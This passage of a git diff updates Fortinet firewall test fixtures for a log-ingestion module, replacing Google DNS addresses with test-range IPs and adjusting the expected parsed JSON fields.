+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "source.nat.ip": "0.0.0.0",
         "source.nat.port": 0,
         "source.packets": 0,
@@ -824,17 +814,7 @@
     },
     {
         "@timestamp": "2019-05-13T16:29:50.000-02:00",
-        "destination.as.number": 42831,
-        "destination.as.organization.name": "UK Dedicated Servers Limited",
         "destination.bytes": 3138,
-        "destination.geo.city_name": "Coventry",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 52.382,
-        "destination.geo.location.lon": -1.5874,
-        "destination.geo.region_iso_code": "GB-COV",
-        "destination.geo.region_name": "Coventry",
         "destination.ip": "185.244.31.158",
         "destination.packets": 5,
         "destination.port": 80,
@@ -991,17 +971,7 @@
     },
     {
         "@timestamp": "2019-05-15T17:45:34.000-02:00",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 5266,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.216.177.83",
         "destination.packets": 12,
         "destination.port": 443,
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/utm.log b/x-pack/filebeat/module/fortinet/firewall/test/utm.log
index 32bce5c6cc44..318a6938dcbe 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/utm.log
+++ b/x-pack/filebeat/module/fortinet/firewall/test/utm.log
@@ -1,12 +1,12 @@
-<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
-<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
-<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
-<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium"
-<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
-<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
+<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony"
+<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email"
+<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=175.16.199.1 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium"
+<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="175.16.199.1" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access"
+<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=175.16.199.1 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN"
 <189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert"
 <190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA"
 <190>date=2019-05-13 time=11:45:03 logid="0211008192" type="utm" subtype="virus" eventtype="infected" level="warning" vd="vdom1" eventtime=1557773103767393505 msg="File is infected." action="blocked" service="HTTP" sessionid=359260 srcip=10.1.100.11 dstip=172.16.200.55 srcport=60446 dstport=80 srcintf="port12" srcintfrole="undefined" dstintf="port11" dstintfrole="undefined" policyid=4 proto=6 direction="incoming" filename="eicar.com" quarskip="File-was-not-quarantined." virus="EICAR_TEST_FILE" dtype="Virus" ref="http://www.fortinet.com/ve?vn=EICAR_TEST_FILE" virusid=2172 url="http://172.16.200.55/virus/eicar.com" profile="g-default" agent="curl/7.47.0" analyticscksum="275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" analyticssubmit="false" crscore=50 craction=2 crlevel="critical"
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
index 678dfabebbe3..109d58f54149 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
+++ b/x-pack/filebeat/module/fortinet/firewall/test/utm.log-expected.json
@@ -1,15 +1,16 @@
 [
     {
         "@timestamp": "2020-04-23T12:17:48.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 1130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 443,
         "event.action": "blocked",
         "event.category": [
@@ -43,7 +44,7 @@
         "log.offset": 0,
         "message": "URL belongs to a denied category in policy",
         "network.bytes": 2282,
-        "network.community_id": "1:jkPSHzqUyADbT5XNqPV58Do0VVg=",
+        "network.community_id": "1:LyyZpRkSbxvRcu1AmbPkX0d9FMs=",
         "network.direction": "outbound",
         "network.iana_number": "6",
         "network.protocol": "https",
@@ -57,8 +58,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "related.user": [
             "elasticuser"
@@ -82,15 +83,16 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:45.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 6812,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 443,
         "event.action": "passthrough",
         "event.category": [
@@ -121,10 +123,10 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 707,
+        "log.offset": 712,
         "message": "URL belongs to an allowed category in policy",
         "network.bytes": 10357,
-        "network.community_id": "1:6x4JdfgMVssswnIG5C8mkIbszLU=",
+        "network.community_id": "1:yxvV3EkgwHQGXl2k7O++IeunEHY=",
         "network.direction": "outbound",
         "network.iana_number": "6",
         "network.protocol": "https",
@@ -138,8 +140,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "related.user": [
             "elasticuser"
@@ -163,14 +165,15 @@
     },
     {
         "@timestamp": "2020-04-23T13:17:35.000-04:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 443,
         "event.action": "pass",
         "event.category": [
@@ -201,10 +204,10 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 1409,
+        "log.offset": 1419,
         "message": "Web.Client: HTTPS.BROWSER,",
         "network.application": "HTTPS.BROWSER",
-        "network.community_id": "1:jz8Ul9WJmuEeHGbclqOri0hlDwI=",
+        "network.community_id": "1:6K2acy3gCzfHsHQdmN+K1fyKqO4=",
         "network.direction": "outbound",
         "network.iana_number": "6",
         "network.protocol": "ssl",
@@ -218,8 +221,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "related.user": [
             "elasticuser"
@@ -243,14 +246,15 @@
     },
     {
         "@timestamp": "2020-04-23T13:17:35.000-04:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 443,
         "event.action": "pass",
         "event.category": [
@@ -281,10 +285,10 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 2112,
+        "log.offset": 2127,
         "message": "Web.Client: HTTPS.BROWSER,",
         "network.application": "HTTPS.BROWSER",
-        "network.community_id": "1:jz8Ul9WJmuEeHGbclqOri0hlDwI=",
+        "network.community_id": "1:6K2acy3gCzfHsHQdmN+K1fyKqO4=",
         "network.direction": "outbound",
         "network.iana_number": "6",
         "network.protocol": "ssl",
@@ -298,8 +302,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "related.user": [
             "elasticuser"
@@ -323,21 +327,22 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:29.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "dns.id": "2234",
         "dns.question.class": "IN",
         "dns.question.name": "elastic.example.com",
         "dns.question.type": "A",
         "dns.resolved_ip": [
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "event.action": "pass",
         "event.category": [
@@ -367,9 +372,9 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 2806,
+        "log.offset": 2826,
         "message": "Domain is monitored",
-        "network.community_id": "1:TAkI/Dqjd84P0/IOYFsZ/dciGyk=",
+        "network.community_id": "1:CEgDbLCgjPBvzcMawzocROJhmOU=",
         "network.iana_number": "17",
         "network.transport": "udp",
         "network.type": "ipv4",
@@ -384,8 +389,8 @@
             "elastic.example.com"
         ],
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "rule.category": "Web-based Email",
         "rule.id": "26",
@@ -400,22 +405,23 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:29.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "dns.id": "2234",
         "dns.question.class": "IN",
         "dns.question.name": "elastic.example.com",
         "dns.question.type": "A",
         "dns.resolved_ip": [
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "event.action": "pass",
         "event.category": [
@@ -445,9 +451,9 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 3356,
+        "log.offset": 3386,
         "message": "Domain is monitored",
-        "network.community_id": "1:TAkI/Dqjd84P0/IOYFsZ/dciGyk=",
+        "network.community_id": "1:CEgDbLCgjPBvzcMawzocROJhmOU=",
         "network.iana_number": "17",
         "network.transport": "udp",
         "network.type": "ipv4",
@@ -462,9 +468,9 @@
             "elastic.example.com"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.2.1",
-            "8.8.4.4",
-            "8.8.8.8"
+            "8.8.4.4"
         ],
         "rule.category": "Web-based Email",
         "rule.id": "26",
@@ -479,14 +485,15 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:11.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 443,
         "event.action": "pass",
         "event.category": [
@@ -517,10 +524,10 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 3915,
+        "log.offset": 3955,
         "message": "Web.Client: HTTPS.BROWSER,",
         "network.application": "HTTPS.BROWSER",
-        "network.community_id": "1:SnL1O7SJ70dFEAbmKNOL/cs7Yis=",
+        "network.community_id": "1:5KZi+brtHoTwzshPHYC6iIQcAIE=",
         "network.direction": "outbound",
         "network.iana_number": "6",
         "network.protocol": "ssl",
@@ -534,8 +541,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "related.user": [
             "elasticuser"
@@ -558,21 +565,22 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:04.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "dns.id": "2352",
         "dns.question.class": "IN",
         "dns.question.name": "elastic.co",
         "dns.question.type": "A",
         "dns.resolved_ip": [
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "event.action": "pass",
         "event.category": [
@@ -602,9 +610,9 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 4595,
+        "log.offset": 4640,
         "message": "Domain is monitored",
-        "network.community_id": "1:oi4FzZ6cP1JOcUzJW8FLs4MB4BM=",
+        "network.community_id": "1:kD75mqzsTS7oiRllEEF3faHh2ic=",
         "network.iana_number": "17",
         "network.transport": "udp",
         "network.type": "ipv4",
@@ -619,8 +627,8 @@
             "elastic.co"
         ],
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "rule.category": "Remote Access",
         "rule.id": "26",
@@ -635,14 +643,15 @@
     },
     {
         "@timestamp": "2020-04-23T12:17:12.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "dns.id": "235",
         "dns.question.class": "IN",
@@ -671,8 +680,8 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 5139,
-        "network.community_id": "1:2iITe7baBXn6W2kcSCMlLR6YGNw=",
+        "log.offset": 5194,
+        "network.community_id": "1:r3fHI3hh+39DMVJua+CV3LAi34M=",
         "network.iana_number": "17",
         "network.transport": "udp",
         "network.type": "ipv4",
@@ -687,8 +696,8 @@
             "elastic.co"
         ],
         "related.ip": [
-            "192.168.2.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.1"
         ],
         "rule.id": "26",
         "rule.ruleset": "elastictest",
@@ -702,13 +711,6 @@
     },
     {
         "@timestamp": "2020-04-23T13:15:18.000-04:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
